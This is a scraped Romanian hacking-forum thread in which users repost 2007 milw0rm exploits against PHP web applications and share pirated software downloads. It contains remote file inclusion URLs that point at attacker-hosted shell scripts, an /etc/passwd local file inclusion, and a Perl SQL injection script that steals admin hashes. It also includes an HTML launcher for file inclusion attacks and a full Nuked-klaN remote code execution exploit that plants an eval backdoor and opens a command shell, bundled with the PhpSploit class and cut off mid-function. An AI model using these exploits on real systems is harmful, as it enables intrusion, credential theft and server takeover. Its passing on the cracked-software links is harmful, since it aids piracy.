Ras

Author : M.Hasran Addahroni Web : [url]http://echo.or.id/adv/adv67-K-159-2007.txt[/url] Critical Lvl : Dangerous Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : WEBO (Web Organizer) version : 1.0 Vendor : [url]http://sourceforge.net/projects/weborganizer/[/url] Description : WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ - Invalid include function at modules/abook/foldertree.php : ---------------foldertree.php-------------------------------------- <?php /* memento : TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" ) TreeItem( $label, $url, $target="", $icon="", $options="" ) */ include_once( "$baseDir/lib/HTML/tree.php"); ... ------------------------------------------------------------------ Variables $baseDir are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~ [url]http://www.target.com/[/url][webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil? Solution: ~~~~~~ - Sanitize variable $config_dir on affected files. - Turn off register_globals ---------------------------------------------------------------------------

# telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie # D.Script: [url]http://www.telltargetcms.de/download/telltarget_1.3.3.zip[/url] # Discovered by: GolD_M = [Mahmood_ali] # Homepage: [url]http://www.Tryag.Com/cc[/url] # Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell # Greetz To: Tryag-Team ....&&& # milw0rm.com [2007-05-09]

#!/usr/bin/perl -w ################################################################################# # # # SimpleNews <= 1.0.0 FINAL SQL Injection Exploit # # # # Discovered by: Silentz # # Payload: Admin Username & Hash Retrieval # # Website: [url]http://www.No_Advertising.com[/url] # # # # Vulnerable Code (print.php): # # # # $news_id = $_GET['news_id']; # # $query = "SELECT * FROM simplenews_articles WHERE news_id = '$news_id'"; # # # # PoC: http://victim.com/print.php?news_id=-999' UNION SELECT 0,username, # # password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /* # # # # Subject To: magic_quotes_gpc set to off # # GoogleDork: Get your own! # # # # Shoutz: The entire No_Advertising community # # # ################################################################################# use LWP::UserAgent; if (@ARGV < 1){ print "-------------------------------------------------------------------------\r\n"; print " SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "Usage: No_Advertising.pl [PATH]\r\n\r\n"; print "[PATH] = Path where SimpleNews is located\r\n\r\n"; print "e.g. No_Advertising.pl http://victim.com/simplenews/\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); } $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "print.php?news_id=-999' UNION SELECT 0,username,password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $res->content =~ /([0-9a-fA-F]{32})/; print "-------------------------------------------------------------------------\r\n"; print " SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "[+] Admin User = ".$res->title, "\r\n"; print "[+] Admin Hash = $1\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; else {print "\nExploit Failed...\n";} # milw0rm.com [2007-05-09]

#AForum =>1.33 Remote file inclusion (Func.php) #Download Script : [url]http://www.agner.org/software/msgbrd2/aforum.zip[/url] #Thanks Str0ke #D0rk:allintitle:List of messageboards #Exploit : #[url]http://localhost/[/url][aforum_path]/common/func.php?CommonAbsDir=shell.txt? #Discovered By : ThE TiGeR #Greetz : Reda, ™~${{BraveHeart}}$~™ #Miro_Tiger100[at]Hotmail[dot]com # milw0rm.com [2007-05-09]

#Miplex2 Remote file inclusion #Download script : [url]http://download.berlios.de/miplex2/miplex2alpha.tar.gz[/url] #Thanks Str0ke #Exploit : #[url]http://victim.com/[/url][miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt? #Discovered by : ThE TiGeR #Greetz : Reda, ™~${{BraveHeart}}$~™ #Miro_Tiger[at]Hotmail[dot]com # milw0rm.com [2007-05-08]

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007) //'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell //'[Author : Mahmood_ali //'[S.Page : [url]http://phpmyportal.info/menu.php[/url] <= Click T.l.chargez phpMyPortal //'[$$ : Free //'=============================================================================================== //'[[V.Code]]------------------------------------------------------ //' //'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php'); //' //'[[V.Code]]--------------------------------------------------------- //# Tryag.Com //# ... //Basic exploit,but any time : ( var path="/inc/" var adres="/articles.inc.php?" //File name var acik ="GLOBALS[CHEMINMODULES]=" // Line 67 var shell="http://www.spy-art.com/xx.txt?" // Shell Tryag-Team function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready rfi.submit(); // Form Submit } </script> </head> <body bgcolor="#000000"> <center> [b]<font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font>[/b]</p> </p> <form method="post" target="getting" name="rfi" onSubmit="command();"> [b]<font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[[url]http://[target]/[/url][scriptpath]</font><font color="#00FF00" size="2" face="Tahoma"> </font><font color="#FF0000" size="2"></font>[/b] <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p> </form> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> [b]<font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font>[/b] [b]<a href="http://tryag.com/cc"> <font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a>[/b]</p> </p> </center> </body> </html> # milw0rm.com [2007-05-09]

treaba e ca eu pe alte forumuri vad cum posteaza lumea de pe milworm si m-am gandit sa postez si eu aici... am sa pun in continuare exploituri.

am pus cateva din exploiturile de pe milw0rm pt ca nu posteaza nimeni niciun exploit nimic... nu am sa mai pun de azi inainte...

AusLogics BoostSpeed 3.6.9.660 AusLogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized. Speed Up PC With BoostSpeed Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features. BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC. Speed Up Internet Adjust your PC for faster images, music and software downloads, increased browsing speed and reliable Internet connections. View your download speed and graphs. To gain additional performance boost you can also turn on DNS Optimization. Block Banner Advertisements Tired of annoying banner advertisements accompanying many web sites? Now you can eliminate advertisements and also speed up your Internet browsing with BoostSpeed Banner Killer! You can add your own web sites to the black list to block them from showing their advertisements. Keep Disk and Registry Clean Get rid of junk on the disks and registry of your PC. Remove hazardous and space-wasting files left by untidy programs and crashes of your system. Dramatically increase the performance of your PC by cleaning, optimizing and defragmenting local disks and registry. Optimize Memory and Appearance Badly written applications constantly steal memory without giving it back. That's why your PC becomes unstable with time and you have to reboot. BoostSpeed automatically frees up computer memory to gain additional performance boost. You can also manually recover memory and clipboard. Keep your PC fast and safe BoostSpeed will detect most of the popular "PC-slowers" - bundle-software (such as eDonkey or Kazaa) which silently download malware and spyware to your computer, taking up internet traffic and slowing down the system. This will also keep your system safe from prying eyes of spyware programs. Boost Software Products BoostSpeed can improve performance of different software products, including Microsoft Office, Internet browsers (such as Internet Explorer, Opera, Mozzila), E-mail clients (Outlook, The Bat), MSN Messenger, ICQ, Media Player and others. System Optimization Tools Greatly increase your PC startup speed with Autorun Manager, where you can disable or remove the programs which try to load up when Windows starts up. Force-uninstall unwanted software products which take up space on your computer and slow it down. Networks Tools Keep your connection alive while you're away, synchronize your computer clock with atomic clock over the Internet, lookup domain names and IP addresses, measure your Internet connection speed. Troubleshoot and improve your Internet connection and local network with an excellent selection of network management tools. Download: http://rapidshare.com/files/30168483/AusLogics_BoostSpeed_3.6.9.660.rar

Sammsoft Advanced Registry Optimizer 5.1Retail Get Advanced Registry Optimizer 5 for top PC performance results. Clean and fix* your PC registry problems now Help keep your PC operating smoothly by using Advanced Registry Optimizer 5 to scan, identify, clean and repair errors in your Windows registry with a single click. Advanced Registry Optimizer can clean and repair unwanted debris left behind by adware and spyware. This top-rated registry tool is extremely powerful, yet easy to use, and will keep your computer operating in "like new" fashion. Advanced Registry Optimizer uses Intellismart technology to scan more than 10 important parts of the registry. It can identify and correct errors that can slow your system down or, cause it to behave erratically, crash or hang. For maximum safety, Advanced Registry Optimizer includes Backup and Undo functionality for any change. Advanced users can select which parts of the registry to operate on. Features of Advanced Registry Optimizer Registry Cleaner deep-scans 12 broad categories: Active X OLE COM Sections User Software Settings System Software Settings Shared DLL's Section Fonts Section Invalid File Associations Run Sections Sound and Applets Uninstall Section Help Section Virtual Device Drivers and Services Application Paths Section Safety Features Backup and Undo Functionality Ability to jump directly to the registry in order to verify all entries from Registry Cleaner and Fixer Detailed date and time log for tracking what changes were made to the registry. Easy and Safe Advanced Registry Optimizer is easy and safe. Version: Supported Operating Systems Windows XP, ME, 2000/2003/NT Download: http://rapidshare.com/files/30167706/Sammsoft_5.1.rar

ZoneAlarm Pro 7.0.337.000 ZoneAlarm Pro 7.0 augments your existing Antivirus solutions. ZoneAlarm Pro adds powerful, multi-layered security and additional protection. Includes Operating System Firewall, Network and Program Firewall, Anti-Spyware, Identity Theft Protection. The latest release improves the Operating System Firewall and applies more robust spyware detection and removal functions. Version 7.0 includes anti-spyware. The Most Secure Firewall with Privacy and Identity Protection Delivers proactive firewall protection. Proactively protects your PC with the most advanced, multi-layered, firewall-based security available. Prevents and removes spyware. Stops spyware before it gets on your PC, removes spyware already on it, and offers extra protection from dangerous websites. -Protects your privacy and identity. -Stops hackers and criminals from stealing your identity or financial assets. -Network and Program Firewall Delivers proactive firewall protection with multiple layers of security that stop inbound, outbound, and program attacks while remaining completely invisible to hackers. Guards the network perimeter from inbound and outbound threats with the world's #1 firewall Prevents spyware and other malicious programs from sending your personal information across the Internet Full stealth mode to keep you concealed from anyone on the Internet Protects your programs from malware Operating System Firewall (OSFirewall™) IMPROVED This additional layer of security prevents hard-to-remove spyware, including rootkits and kernel-level threats, from getting onto your PC and causing damage. Identify and filter over 100,000 applications for constant protection against threats Monitor program installation, registry changes and file access down to your PC's core Monitor additional program actions for more thorough protection Prevents malicious software from damaging files in your core Windows operating system Identity Theft Protection While ZoneAlarm continues to secure your identity information on your PC, these new Identity Theft Protection services also prevent identity theft over the Internet and even in the physical world. Learn More Stops pre-approved credit card offers, which contain sensitive financial data often used by criminals for identity theft (offered via a credit industry service - US only) Detects theft by monitoring both cyberspace and stolen credit card lists from vendors, consumers, and the underground. Alerts you if your credit cards are Provides a low-cost, public records report to alert you of fraud, such as phony DMV records (US only) Assists identity theft victims with personal telephone counseling to guide them through resolution and recovery (US only) Offers identity theft education and tools to help you prevent, detect and recover from identity theft Anti-Spyware IMPROVED More robust detection and removal functions perform deeper scans at every level and purge spyware from your PC. Ability to remove even the most persistent, hard-to-find spyware that infiltrate your PC at the core level Privacy Protection Manages and blocks pop-up ads, online profiling, cookies, cache, and scripts so you can surf in peace. Game Mode One-click control temporarily suppresses most security alerts and prevents them from interrupting your fun while maintaining maximum protection for your PC. Essential Email Security Quarantines suspicious attachments to help defend against unknown viruses; automatically halts outbound messages to keep you from accidentally infecting others. Wireless PC Protection Automatically detects wireless networks and secures your PC from hackers and other Internet threats wherever you're connected - at home or on the road. SmartDefense™ Service Provides your PC with real-time security updates, improved response to breaking spyware threats, and new attack protection capabilities. SmartDefense Advisor automatically adjusts your security settings for maximum protection against the latest virus and spyware outbreaks Includes DefenseNet, an early warning system that gathers data from the Zone Labs user community on the latest spyware and malware outbreaks Leverages this vast user knowledge by including it in signature updates that protect your PC from the latest spyware attacks Download: http://rapidshare.com/files/30167282/ZoneAlarmPro7.0.337.000.rar

am avut ceva treaba cein si nu am avut cum sa stau la calculator si nu am putut sa iti zic culori sau dastea... oricum nu aveam pretentii. vroiam un avatar cum poti tu sa faci multumesc pt avatarul pe care mi l-ai facut! EDIT a iesit calumea cu ras-ul ala in colt R-ul nu prea se intelege.

spiry a postat asta pe 12 Aug 2006 06:34 pm ... iar acum suntem in 2007

#Berylium2 Remote file inclusion #Download script : [url]http://berylium.org/source/be2-2003-08-18.tar.gz[/url] #Thanks Str0ke #Exploit : #[url]http://victim.com/[/url][berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt? #Discovered by : ThE TiGeR #Miro_Tiger[at]hotmail[dot]com #Greetz : ™~${{BraveHeart}}$~™ # milw0rm.com [2007-05-07] cam veche dar mere

#DynamicPAD Remote file inclusion (HomeDir) #Download script : [url]http://dynamicpad.org/dp.tar.gz[/url] #Thanks Str0ke #Dork : "Powered By DynamicPAD" #Exploit : #[url]http://victim.com/[/url][dp_path]/dp_logs.php?HomeDir=shell.txt? #[url]http://victom.com/[/url][dp_path]/index.php?HomeDir= shell.txt? #Discovered by : ThE TiGeR #Miro_Tiger[at]Hotmail[dot]com # milw0rm.com [2007-05-07]

# BeyazKurt - [email]B3yazKurt@Hotmail.Com[/email] # # ACGV Annu (rubrik) Local File Inclusion Exploit # # Lamerler ortada kol geziyo aman dikkat ! Tr0jan kazas?na denk gelmeyin !! # # [url]Www.HackSafety.Com[/url] // Hackingde yeni bir ça? ... # # HackSafety.Com & WorldHackerz.Net Kardeºli?i... # # rerere rararara bjk bjk MUAHAHAH # # Fincan? taºtan oyarlar aman?n oyarlar beºiktaºa böyle ... bjk'e böyle ... !! # # Download : [url]http://www.phpscripts-fr.net/scripts/download.php?id=1107[/url] /theme/acgv.php?rubrik=../../../etc/passwd%00 # milw0rm.com [2007-05-07]

# Friendly 1.0d1 (friendly_path)Remote File Inclusion Vulnerabilities # D.Script: [url]http://friendlyphp.org/downloads/[/url] # Discovered by: GolD_M = [Mahmood_ali] # Homepage: [url]http://www.Tryag.cc[/url] # Exploit:[Path]/_friendly/core/data/_load.php?friendly_path=shell # Exploit:[Path]/_friendly/core/data/yaml.inc.php?friendly_path=shell # Exploit:[Path]/_friendly/core/display/_load.php?friendly_path=shell # Exploit:[Path]/_friendly/core/support/_load.php?friendly_path=shell # Greetz To: Tryag-Team ....## # milw0rm.com [2007-05-06]

<?php # # Nuked-klaN 1.7.6 Remote Code Execution Exploit # ------------------------------------------------ # Author: DarkFig <gmdarkfig@gmail.com> # Website: [url]http://www.acid-root.new.fr/[/url] # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy <proxyip>:<proxyport> $pra = ''; # basic authentification <proxyuser:proxypwd> $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php'."\n" # php code .'error_reporting(0);' .'if(isset($_SERVER[HTTP_SHELL]))' .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' .'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$i<count($request);$i++) { $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT("; $sql = $deb.$request[$i]."))) #"; $xpl->addheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches)) die("Exploit Failed"); $what = array("login","passwd","user_id","session"); for($i=0;$i<count($what);$i++) print "\n".$what[$i]." -> ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$i<count($sql);$i++) $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$i<strlen($data);$i++) { $char .= ord($data[$i]); if($i != (strlen($data)-1)) $char .= ','; } return $char.')'; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4) * VERSION: 1.2 * LICENSE: GNU General Public License * ORIGINAL URL: [url]http://www.acid-root.new.fr/tools/03061230.txt[/url] * FILENAME: phpsploitclass.php * * CONTACT: [email]gmdarkfig@gmail.com[/email] (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((| * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { /** * This function is called by the get()/post() functions. * You don't have to call it, this is the main function. * * @return $server_response */ private function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) { if(preg_match("/$cookn=/",$this->cookie)) { $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); } else { $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else { if(!empty($this->cookie)) { $cookn = preg_replace("/(.*);$/","$1",$cookn); $cookarr = explode(";",str_replace(" ", "",$cookn)); for($i=0;$i<count($cookarr);$i++) { preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. Several methods are supported: * * $this->addheader("headername","headervalue"); * or * $this->addheader("headername: headervalue"); * * @param string $headername * @param string $headervalue */ public function addheader($headern,$headervalue='') { // $this->addheader("name","value"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match("/$headern:/",$this->header)) { $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); } else { $this->header .= "\r\n".$headern.": ".$headervalue; } } else { $this->header=$headern.": ".$headervalue; } } // $this->addheader("name: value"); else { if(!empty($this->header)) { $headarr = explode(": ",$headern); $headern = $headarr[0]; $headerv = $headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** * This function allows you to use an http proxy server. * Several methods are supported: * * $this->proxy("proxyip","8118"); * or * $this->proxy("proxyip:8118") * * @param string $proxyhost * @param integer $proxyport */ public function proxy($proxy,$proxyp='') { // $this->proxy("localhost:8118"); if(empty($proxyp)) { preg_match("/^(\S*)\d+)$/",$proxy,$proxarr); $proxh = $proxarr[1]; $proxp = $proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } // $this->proxy("localhost",8118); else { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an http proxy server * which requires a basic authentification. Several * methods are supported: * * $this->proxyauth("darkfig","dapasswd"); * or * $this->proxyauth("darkfig:dapasswd"); * * @param string $proxyuser * @param string $proxypass */ public function proxyauth($proxyauth,$proxypasse='') { // $this->proxyauth("darkfig:password"); if(empty($proxypasse)) { preg_match("/^(.*).*)$/",$proxyauth,$proxautharr); $proxu = $proxautharr[1]; $proxp = $proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } // $this->proxyauth("darkfig","password"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** * This function allows you to set the "User-Agent" header. * Several methods are possible to do that: * * $this->agent("Mozilla Firefox"); * or * $this->addheader("User-Agent: Mozilla Firefox"); * or * $this->addheader("User-Agent","Mozilla Firefox"); * * @param string $useragent */ public function agent($useragent) { $this->agent=$useragent; } /** * This function returns the header which will be * in the next request. * * $this->showheader(); * * @return $header */ public function showheader() { return $this->header; } /** * This function returns the cookie which will be * in the next request. * * $this->showcookie(); * * @return $storedcookies */ public function showcookie() { return $this->cookie; } /** * This function returns the last formed * http request (the http packet). * * $this->showlastrequest(); * * @return $last_http_request */ public function showlastrequest() { return $this->packet; } /** * This function sends the formed http packet with the * GET method. You can precise the port of the host. * * $this->get("http://localhost"); * $this->get("http://localhost:888/xd/tst.php"); * * @param string $urlwithpath * @return $server_response */ public function get($url) { $this->target($url); $this->method="get"; return $this->sock(); } /** * This function sends the formed http packet with the * POST method. You can precise the port of the host. * * $this->post("http://localhost/index.php","admin=1&user=dark"); * * @param string $urlwithpath * @param string $postdata * @return $server_response */ public function post($url,$data) { $this->target($url); $this->method="post"; $this->data=$data; return $this->sock(); } /** * This function sends the formed http packet with the * POST method using the multipart/form-data enctype. * * $array = array( * frmdt_url => "http://localhost/upload.php", * frmdt_boundary => "123456", # Optional * "email" => "me@u.com", * "varname" => array( * frmdt_type => "image/gif", # Optional * frmdt_transfert => "binary", # Optional * frmdt_filename => "hello.php", * frmdt_content => "<?php echo ''; ?>")); * $this->formdata($array); * * @param array $array * @return $server_response */ public function formdata($array) { $this->target($array[frmdt_url]); $this->method="formdata"; $this->data=''; if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; else $this->boundary=$array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match("#^frmdt_(boundary|url)#",$key)) { $this->data .= "-----------------------------".$this->boundary."\r\n"; $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= "-----------------------------".$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content of the server response * without the headers. * * $this->getcontent($this->get("http://localhost/")); * or * $this->getcontent(); * * @param string $server_response * @return $onlythecontent */ public function getcontent($code='') { if(empty($code)) $code = $this->recv; $content = explode("\n",$code); $onlycode = ''; for($i=1;$i<count($content);$i++) { if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1; if($ok) $onlycode .= $content[$i]."\n"; } return $onlycode; } /** * This function returns the headers of the server response * without the content. * * $this->getheader($this->post("http://localhost/x.php","x=1&z=2")); * or * $this->getheader(); * * @param string $server_response * @return $onlytheheaders */ public function getheader($code='') { if(empty($code)) $code = $this->recv; $header = explode("\n",$code); $onlyheader = $header[0]."\n"; for($i=1;$i<count($header);$i++) { if(!preg_match("/^(\S*):/",$header[$i])) break; $onlyheader .= $header[$i]."\n"; } return $onlyheader; } /** * This function is called by the cookiejar() function. * It adds the value of the "Set-Cookie" header in the "Cookie" * header for the next request. You don't have to call it. * * @param string $server_response */ private function getcookie($code) { $carr = explode("\n",str_replace("\r\n","\n",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match("/set-cookie: 